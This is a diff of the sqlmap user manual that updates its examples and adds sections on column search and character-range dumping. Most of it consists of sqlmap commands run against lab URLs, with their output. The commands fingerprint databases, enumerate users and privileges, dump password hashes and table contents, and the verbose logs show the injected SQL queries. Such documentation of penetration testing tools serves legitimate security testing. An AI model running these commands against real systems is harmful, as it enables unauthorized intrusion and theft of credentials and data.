      @@ -2617,7 +2810,7 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -b -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -b -v 0
       
       banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
       
      @@ -2628,7 +2821,7 @@ banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -b -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -b -v 0
       
       banner:
       ---
      @@ -2645,7 +2838,7 @@ Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
       

      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
      +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 0 -b
       
       banner:
       ---
      @@ -2659,9 +2852,9 @@ Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
       

      -

      Current user

      +

      Session user

      -

      Option: --current-user

      +

      Option: --current-user

      It is possible to retrieve the database management system's user which is effectively performing the query on the database from the web application.

      @@ -2670,7 +2863,7 @@ effectively performing the query on the database from the web application.

      -python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
      +python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
       
       current user:    'testuser@localhost'
       
      @@ -2680,7 +2873,7 @@ current user: 'testuser@localhost'

      Current database

      -

      Option: --current-db

      +

      Option: --current-db

      It is possible to retrieve the database management system's database the web application is connected to.

      @@ -2689,7 +2882,7 @@ web application is connected to.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
       
       current database:    'master'
       
      @@ -2697,27 +2890,27 @@ current database: 'master'

      -

      Detect if the DBMS current user is a database administrator

      +

      Detect if the session user is a database administrator (DBA)

      -

      Option: --is-dba

      +

      Option: --is-dba

      -

      It is possible to detect if the database management system session user is +

      It is possible to detect if the current database management system session user is a database administrator.

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 2
       
       [...]
       back-end DBMS: PostgreSQL
       
       [hh:mm:49] [INFO] testing if current user is DBA
      -[hh:mm:49] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
      +[hh:mm:49] [DEBUG] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
       usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END)
       [hh:mm:49] [INFO] retrieved: 1
      -[hh:mm:50] [INFO] performed 13 queries in 0 seconds
      +[hh:mm:50] [DEBUG] performed 13 queries in 0 seconds
       current user is DBA:    'True'
       
      @@ -2727,17 +2920,17 @@ current user is DBA: 'True'

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --is-dba -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --is-dba -v 2
       
       [...]
       back-end DBMS: Oracle
       
      -[16:40:57] [INFO] testing if current user is DBA
      -[16:40:58] [INFO] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
      +[hh:mm:57] [INFO] testing if current user is DBA
      +[hh:mm:58] [DEBUG] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
       GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) 
       THEN 1 ELSE 0 END) FROM DUAL
      -[16:40:58] [INFO] retrieved: 1
      -[16:40:58] [INFO] performed 13 queries in 0 seconds
      +[hh:mm:58] [INFO] retrieved: 1
      +[hh:mm:58] [DEBUG] performed 13 queries in 0 seconds
       current user is DBA:    'True'
       
      @@ -2746,7 +2939,7 @@ current user is DBA: 'True'

      Users

      -

      Option: --users

      +

      Option: --users

      It is possible to enumerate the list of database management system users.

      @@ -2754,7 +2947,7 @@ current user is DBA: 'True'

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --users -v 0
       
       database management system users [3]:
       [*] postgres
      @@ -2767,7 +2960,7 @@ database management system users [3]:
       
       

      Users password hashes

      -

      Options: --passwords and -U

      +

      Options: --passwords and -U

      It is possible to enumerate the password hashes for each database management system user.

      @@ -2776,7 +2969,7 @@ management system user.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
       
       [*] debian-sys-maint [1]:
           password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892
      @@ -2795,7 +2988,7 @@ want to enumerate the password hashes.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --passwords \
         -U sa -v 0
       
       database management system users password hashes:
      @@ -2820,29 +3013,19 @@ current user and will retrieve the password hashes for this user.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --passwords \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
         -U CU -v 1
       
       [...]
       back-end DBMS: PostgreSQL
       
       [hh:mm:48] [INFO] fetching current user
      -[hh:mm:48] [INFO] query: COALESCE(CAST(CURRENT_USER AS CHARACTER(10000)), CHR(32))
       [hh:mm:48] [INFO] retrieved: postgres
      -[hh:mm:49] [INFO] performed 62 queries in 0 seconds
       [hh:mm:49] [INFO] fetching database users password hashes for current user
       [hh:mm:49] [INFO] fetching number of password hashes for user 'postgres'
      -[hh:mm:49] [INFO] query: SELECT COALESCE(CAST(COUNT(DISTINCT(passwd)) AS CHARACTER(10000)), 
      -CHR(32)) FROM pg_shadow WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
      -CHR(114)||CHR(101)||CHR(115)
       [hh:mm:49] [INFO] retrieved: 1
      -[hh:mm:49] [INFO] performed 13 queries in 0 seconds
       [hh:mm:49] [INFO] fetching password hashes for user 'postgres'
      -[hh:mm:49] [INFO] query: SELECT DISTINCT(COALESCE(CAST(passwd AS CHARACTER(10000)), 
      -CHR(32))) FROM pg_shadow WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
      -CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
       [hh:mm:49] [INFO] retrieved: md5d7d880f96044b72d0bba108ace96d1e4
      -[hh:mm:51] [INFO] performed 251 queries in 2 seconds
       database management system users password hashes:
       [*] postgres [1]:
           password hash: md5d7d880f96034b72d0bba108afe96c1e7
      @@ -2853,7 +3036,7 @@ database management system users password hashes:
       
       

      Users privileges

      -

      Options: --privileges and -U

      +

      Options: --privileges and -U

      It is possible to enumerate the privileges for each database management system user.

      @@ -2862,7 +3045,7 @@ system user.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
       
       [hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS'
       [hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP'
      @@ -2931,7 +3114,7 @@ want to enumerate the privileges.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --privileges \
         -U postgres -v 0
       
       database management system users privileges:
      @@ -2944,8 +3127,8 @@ database management system users privileges:
       

      As you can see, depending on the user privileges, sqlmap identifies if the -user is a database management system administrator and show next to the -username this information.

      +user is a database management system administrator and shows this information +next to the username.

      If you provide CU as username it will consider it as an alias for current user and will enumerate the privileges for this user.

      @@ -2954,41 +3137,23 @@ current user and will enumerate the privileges for this user.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --passwords \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
         -U CU -v 1
       
       [...]
       back-end DBMS: PostgreSQL
       
       [hh:mm:25] [INFO] fetching current user
      -[hh:mm:25] [INFO] query: COALESCE(CAST(CURRENT_USER AS CHARACTER(10000)), CHR(32))
       [hh:mm:25] [INFO] retrieved: postgres
      -[hh:mm:25] [INFO] performed 62 queries in 0 seconds
       [hh:mm:25] [INFO] fetching database users privileges for current user
       [hh:mm:25] [INFO] fetching number of privileges for user 'postgres'
      -[hh:mm:25] [INFO] query: SELECT COALESCE(CAST(COUNT(DISTINCT(usename)) AS CHARACTER(10000)), 
      -CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
      -CHR(114)||CHR(101)||CHR(115)
       [hh:mm:25] [INFO] retrieved: 1
      -[hh:mm:25] [INFO] performed 13 queries in 0 seconds
       [hh:mm:25] [INFO] fetching privileges for user 'postgres'
       [hh:mm:25] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
       into distinct queries to be able to retrieve the output even if we are going blind
      -[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usecreatedb THEN 1 ELSE 0 END) AS 
      -CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
      -CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
       [hh:mm:25] [INFO] retrieved: 1
      -[hh:mm:25] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usesuper THEN 1 ELSE 0 END) AS 
      -CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
      -CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
       [hh:mm:25] [INFO] retrieved: 1
      -[hh:mm:25] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usecatupd THEN 1 ELSE 0 END) AS 
      -CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
      -CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
       [hh:mm:25] [INFO] retrieved: 1
      -[hh:mm:25] [INFO] performed 13 queries in 0 seconds
       database management system users privileges:
       [*] postgres (administrator) [3]:
           privilege: catupd
      @@ -3004,7 +3169,7 @@ management system is Microsoft SQL Server.

      Available databases

      -

      Option: --dbs

      +

      Option: --dbs

      It is possible to enumerate the list of databases.

      @@ -3012,7 +3177,7 @@ management system is Microsoft SQL Server.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
       
       available databases [6]:
       [*] master
      @@ -3030,18 +3195,18 @@ management system is Oracle.

      Databases tables

      -

      Options: --tables and -D

      +

      Options: --tables and -D

      It is possible to enumerate the list of tables for all database -manangement system's databases.

      +management system's databases.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --tables -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --tables -v 0
       
      -Database: test
      +Database: testdb
       [1 table]
       +---------------------------------------+
       | users                                 |
      @@ -3101,10 +3266,10 @@ that you want to enumerate the tables.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --tables \
      -  -D test -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --tables \
      +  -D testdb -v 0
       
      -Database: test
      +Database: testdb
       [1 table]
       +---------------------------------------+
       | users                                 |
      @@ -3117,7 +3282,7 @@ Database: test
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --tables \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --tables \
         -D users -v 0
       
       Database: USERS
      @@ -3137,49 +3302,49 @@ Database: USERS
       

      Note that on Oracle you have to provide the TABLESPACE_NAME -instead of the database name, in my example that is users to -retrieve all tables owned by an Oracle database management system -user.

      +instead of the database name. In provided example users was +used to retrieve all tables owned by an Oracle database management +system user.

      Database table columns

      -

      Options: --columns, -T and -D

      +

      Options: --columns, -C, -T and -D

      It is possible to enumerate the list of columns for a specific database table. -This functionality depends on the -T to specify the table name +This functionality depends on the option -T to specify the table name and optionally on -D to specify the database name.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns \
      -  -T users -D test -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
      +  -T users -D testdb -v 1
       
       [...]
       back-end DBMS: MySQL >= 5.0.0
       
      -[hh:mm:25] [WARNING] missing database parameter, sqlmap is going to use the current 
      -database to enumerate table 'users' columns
      -[hh:mm:25] [INFO] fetching current database
      -[hh:mm:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
      -[hh:mm:25] [INFO] retrieved: test
      -[hh:mm:25] [INFO] performed 34 queries in 0 seconds
      -[hh:mm:25] [INFO] fetching columns for table 'users' on database 'test'
      -[hh:mm:25] [INFO] fetching number of columns for table 'users' on database 'test'
      -[...]
      -Database: test
      +[hh:mm:20] [INFO] fetching columns for table 'users' on database 'testdb'
      +[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
      +[hh:mm:20] [INFO] retrieved: 3
      +[hh:mm:20] [INFO] retrieved: id
      +[hh:mm:20] [INFO] retrieved: int(11)
      +[hh:mm:21] [INFO] retrieved: name
      +[hh:mm:21] [INFO] retrieved: varchar(500)
      +[hh:mm:21] [INFO] retrieved: surname
      +[hh:mm:21] [INFO] retrieved: varchar(1000)
      +Database: testdb
       Table: users
       [3 columns]
      -+---------+-------------+
      -| Column  | Type        |
      -+---------+-------------+
      -| id      | int(11)     |
      -| name    | varchar(40) |
      -| surname | varchar(60) |
      -+---------+-------------+
      ++---------+---------------+
      +| Column  | Type          |
      ++---------+---------------+
      +| id      | int(11)       |
      +| name    | varchar(500)  |
      +| surname | varchar(1000) |
      ++---------+---------------+
       

      @@ -3188,7 +3353,7 @@ Table: users

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --columns \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --columns \
         -T users -D master -v 0
       
       Database: master
      @@ -3209,7 +3374,7 @@ Table: users
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --columns \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --columns \
         -T users -D public -v 0
       
       Database: public
      @@ -3227,8 +3392,8 @@ Table: users
       

      Note that on PostgreSQL you have to provide public or the -name of a system database because it is not possible to enumerate other -databases tables, only the tables under the schema that the web +name of a system database. That's because it is not possible to enumerate +other databases tables, only the tables under the schema that the web application's user is connected to, which is always public.

      If the database name is not specified, the current database name is used.

      @@ -3237,36 +3402,70 @@ application's user is connected to, which is always public.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
         -T users -v 1
       
       [...]
       back-end DBMS: MySQL >= 5.0.0
       
      -[hh:mm:13] [WARNING] missing database parameter, sqlmap is going to use the current 
      +[hh:mm:45] [WARNING] missing database parameter, sqlmap is going to use the current 
       database to enumerate table 'users' columns
      -[hh:mm:13] [INFO] fetching current database
      -[hh:mm:13] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
      -[hh:mm:13] [INFO] retrieved: test
      -[hh:mm:13] [INFO] performed 34 queries in 0 seconds
      -[hh:mm:13] [INFO] fetching columns for table 'users' on database 'test'
      -[hh:mm:13] [INFO] fetching number of columns for table 'users' on database 'test'
      -[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
      -FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
      -table_schema=CHAR(116,101,115,116)
      -[hh:mm:13] [INFO] retrieved: 3
      -[hh:mm:13] [INFO] performed 13 queries in 0 seconds
      -[...]
      -Database: test
      +[hh:mm:45] [INFO] fetching current database
      +[hh:mm:45] [INFO] retrieved: testdb
      +[hh:mm:45] [INFO] fetching columns for table 'users' on database 'testdb'
      +[hh:mm:45] [INFO] fetching number of columns for table 'users' on database 'testdb'
      +[hh:mm:45] [INFO] retrieved: 3
      +[hh:mm:45] [INFO] retrieved: id
      +[hh:mm:45] [INFO] retrieved: int(11)
      +[hh:mm:46] [INFO] retrieved: name
      +[hh:mm:46] [INFO] retrieved: varchar(500)
      +[hh:mm:46] [INFO] retrieved: surname
      +[hh:mm:46] [INFO] retrieved: varchar(1000)
      +Database: testdb
       Table: users
       [3 columns]
      -+---------+-------------+
      -| Column  | Type        |
      -+---------+-------------+
      -| id      | int(11)     |
      -| name    | varchar(40) |
      -| surname | varchar(60) |
      -+---------+-------------+
      ++---------+---------------+
      +| Column  | Type          |
      ++---------+---------------+
      +| id      | int(11)       |
      +| name    | varchar(500)  |
      +| surname | varchar(1000) |
      ++---------+---------------+
      +
      +
      +

      + +

      You can also provide the -C option to specify the table columns +name like the one you provided to be enumerated.

      + +

      Example on a MySQL 5.0.67 target:

      +

      +

      +
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
      +  -T users -C name -v 1
      +
      +[...]
      +[hh:mm:20] [WARNING] missing database parameter, sqlmap is going to use the current 
      +database to enumerate table 'users' columns
      +[hh:mm:20] [INFO] fetching current database
      +[hh:mm:20] [INFO] retrieved: testdb
      +[hh:mm:20] [INFO] fetching columns like 'name' for table 'users' on database 'testdb'
      +[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
      +[hh:mm:20] [INFO] retrieved: 2
      +[hh:mm:20] [INFO] retrieved: name
      +[hh:mm:20] [INFO] retrieved: varchar(500)
      +[hh:mm:21] [INFO] retrieved: surname
      +[hh:mm:21] [INFO] retrieved: varchar(1000)
      +Database: testdb
      +Table: users
      +[2 columns]
      ++---------+---------------+
      +| Column  | Type          |
      ++---------+---------------+
      +| name    | varchar(500)  |
      +| surname | varchar(1000) |
      ++---------+---------------+
       

      @@ -3274,50 +3473,64 @@ Table: users

      Dump database table entries

      -

      Options: --dump, -C, -T, -D, ---start and --stop

      +

      Options: --dump, -C, -T, -D, +--start, --stop, --first +and --last

      -

      It is possible to dump the entries for a specific database table. -This functionality depends on the -T to specify the table name -and optionally on -D to specify the database name. -If the database name is not specified, the current database name is used.

      +

      It is possible to dump table entries. +This functionality depends on the option -T to specify the table +name or on the option -C to specify the column name and, +optionally on -D to specify the database name.

      + +

      If the table name is specified, but the database name is not, the current +database name is used.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump \
         -T users -v 1
       
       [...]
       back-end DBMS: MySQL >= 5.0.0
       
      -[hh:mm:13] [WARNING] missing database parameter, sqlmap is going to use the current 
      +[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current 
       database to dump table 'users' entries
      -[hh:mm:13] [INFO] fetching current database
      -[hh:mm:13] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
      -[hh:mm:13] [INFO] retrieved: test
      -[hh:mm:13] [INFO] performed 34 queries in 0 seconds
      -[hh:mm:13] [INFO] fetching columns for table 'users' on database 'test'
      -[hh:mm:13] [INFO] fetching number of columns for table 'users' on database 'test'
      -[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
      -FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
      -table_schema=CHAR(116,101,115,116)
      -[hh:mm:13] [INFO] retrieved: 3
      -[hh:mm:13] [INFO] performed 13 queries in 0 seconds
      -[...]
      -Database: test
      +[hh:mm:41] [INFO] fetching current database
      +[hh:mm:41] [INFO] retrieved: testdb
      +[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
      +[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
      +[hh:mm:41] [INFO] retrieved: 3
      +[hh:mm:41] [INFO] retrieved: id
      +[hh:mm:41] [INFO] retrieved: name
      +[hh:mm:41] [INFO] retrieved: surname
      +[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
      +[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
      +[hh:mm:41] [INFO] retrieved: 4
      +[hh:mm:41] [INFO] retrieved: 1
      +[hh:mm:42] [INFO] retrieved: luther
      +[hh:mm:42] [INFO] retrieved: blissett
      +[hh:mm:42] [INFO] retrieved: 2
      +[hh:mm:42] [INFO] retrieved: fluffy
      +[hh:mm:42] [INFO] retrieved: bunny
      +[hh:mm:42] [INFO] retrieved: 3
      +[hh:mm:42] [INFO] retrieved: wu
      +[hh:mm:42] [INFO] retrieved: ming
      +[hh:mm:43] [INFO] retrieved: 4
      +[hh:mm:43] [INFO] retrieved:  
      +[hh:mm:43] [INFO] retrieved: nameisnull
      +Database: testdb
       Table: users
      -[5 entries]
      -+----+----------------------------------------------+-------------------+
      -| id | name                                         | surname           |
      -+----+----------------------------------------------+-------------------+
      -| 1  | luther                                       | blissett          |
      -| 2  | fluffy                                       | bunny             |
      -| 3  | wu                                           | ming              |
      -| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
      -| 5  | NULL                                         | nameisnull        |
      -+----+----------------------------------------------+-------------------+
      +[4 entries]
      ++----+--------+------------+
      +| id | name   | surname    |
      ++----+--------+------------+
      +| 1  | luther | blissett   |
      +| 2  | fluffy | bunny      |
      +| 3  | wu     | ming       |
      +| 4  | NULL   | nameisnull |
      ++----+--------+------------+
       

      @@ -3329,7 +3542,7 @@ that you want to enumerate the entries.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dump \
         -T users -D master -C surname -v 0
       
       Database: master
      @@ -3348,15 +3561,94 @@ Table: users
       

      +

      If only the column name is specified, sqlmap will enumerate and ask the +user to dump all databases' tables containing user provided column(s). +This feature can be useful to identify, for instance, tables containing +custom application credentials.

      + +

      Example on a MySQL 5.0.67 target:

      +

      +

      +
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
      +  -C "urna"
      +
      +[...]
      +back-end DBMS: MySQL >= 5.0.0
      +
      +do you want sqlmap to consider provided column(s):
      +[1] as LIKE column names (default)
      +[2] as exact column names
      +> 1
      +[hh:mm:08] [INFO] fetching databases with tables containing columns like 'urna'
      +[hh:mm:08] [INFO] fetching number of databases with tables containing columns like 
      +'urna'
      +[hh:mm:08] [INFO] retrieved: 1
      +[hh:mm:08] [INFO] retrieved: testdb
      +[hh:mm:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
      +[hh:mm:10] [INFO] fetching number of tables containing columns like 'urna' in 
      +database 'testdb'
      +[hh:mm:10] [INFO] retrieved: 1
      +[hh:mm:10] [INFO] retrieved: users
      +[hh:mm:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
      +[hh:mm:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
      +[hh:mm:10] [INFO] retrieved: 1
      +[hh:mm:10] [INFO] retrieved: surname
      +Columns like 'urna' were found in the following databases:
      +Database: testdb
      +Table: users
      +[1 column]
      ++---------+
      +| Column  |
      ++---------+
      +| surname |
      ++---------+
      +
      +do you want to dump entries? [Y/n] y
      +which database(s)?
      +[a]ll (default)
      +[testdb]
      +[q]uit
      +> 
      +which table(s) of database 'testdb'?
      +[a]ll (default)
      +[users]
      +[s]kip
      +[q]uit
      +> 
      +[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on 
      +database 'testdb'
      +[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table 
      +'users' on database 'testdb'
      +[hh:mm:23] [INFO] retrieved: 4
      +[hh:mm:23] [INFO] retrieved: blissett
      +[hh:mm:23] [INFO] retrieved: bunny
      +[hh:mm:23] [INFO] retrieved: ming
      +[hh:mm:23] [INFO] retrieved: nameisnull
      +Database: testdb
      +Table: users
      +[4 entries]
      ++------------+
      +| surname    |
      ++------------+
      +| blissett   |
      +| bunny      |
      +| ming       |
      +| nameisnull |
      ++------------+
      +
      +
      +

      +

      sqlmap also stores for each table the dumped entries in a CSV format file. -You can see the absolute path where it stored the dumped tables entries +You can see the absolute path where sqlmap stores the dumped tables entries by providing a verbosity level greater than or equal to 1.

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --dump \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --dump \
         -T users -D public -v 1
       
       [...]
      @@ -3369,31 +3661,33 @@ Table: users
       | 1  | luther                                       | blissett          |
       | 2  | fluffy                                       | bunny             |
       | 3  | wu                                           | ming              |
      -| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
      +| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
       | 5  |                                              | nameisnull        |
       +----+----------------------------------------------+-------------------+
       
      -[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
      -192.168.1.121/dump/public/users.csv'
      +[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/
      +172.16.213.131/dump/public/users.csv'
       [...]
       
      -$ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv 
      -"id","name","surname"
      +$ cat ./output/172.16.213.131/dump/public/users.csv 
      +id,name,surname
       "1","luther","blissett"
       "2","fluffy","bunny"
       "3","wu","ming"
      -"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header"
      +"4","sqlmap/0.8 (http://sqlmap.sourceforge.net)","user agent header"
       "5","","nameisnull"
       

      -

      You can also provide the --start and/or the --stop -options to limit the dump to a range of entries.

      +

      You can also provide the --start and/or the --stop +options to limit the dump to a range of entries, while those entries can be further +limited to a range of character positions provided with --first +and/or the --last options:

        -
      • --start specifies the first entry to enumerate
      • -
      • --stop specifies the last entry to enumerate
      • +
      • --start specifies the first entry to enumerate.
      • +
      • --stop specifies the last entry to enumerate.

      @@ -3401,51 +3695,51 @@ options to limit the dump to a range of entries.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump \
      -  -T users -D test --start 2 --stop 4 -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump \
      +  -T users -D testdb --start 2 --stop 4 -v 0
       
      -Database: test
      +Database: testdb
       Table: users
       [3 entries]
      -+----+----------------------------------------------+-------------------+
      -| id | name                                         | surname           |
      -+----+----------------------------------------------+-------------------+
      -| 2  | fluffy                                       | bunny             |
      -| 3  | wu                                           | ming              |
      -| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
      -+----+----------------------------------------------+-------------------+
      ++----+--------------------------------------------+-------------------+
      +| id | name                                       | surname           |
      ++----+--------------------------------------------+-------------------+
      +| 2  | fluffy                                     | bunny             |
      +| 3  | wu                                         | ming              |
      +| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
      ++----+--------------------------------------------+-------------------+
       

      -

      As you can see, sqlmap is very flexible: you can leave it automatically -enumerate the whole database table up to a single column of a specific -table entry.

      +

      As you can see, sqlmap is very flexible. You can leave it to automatically +enumerate the whole database table up to a range of characters of a single +column of a specific table entry.

      Dump all databases tables entries

      -

      Options: --dump-all and --exclude-sysdbs

      +

      Options: --dump-all and --exclude-sysdbs

      It is possible to dump all databases tables entries at once.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
       
      -Database: test
      +Database: testdb
       Table: users
       [5 entries]
      -+----+----------------------------------------------+-------------------+
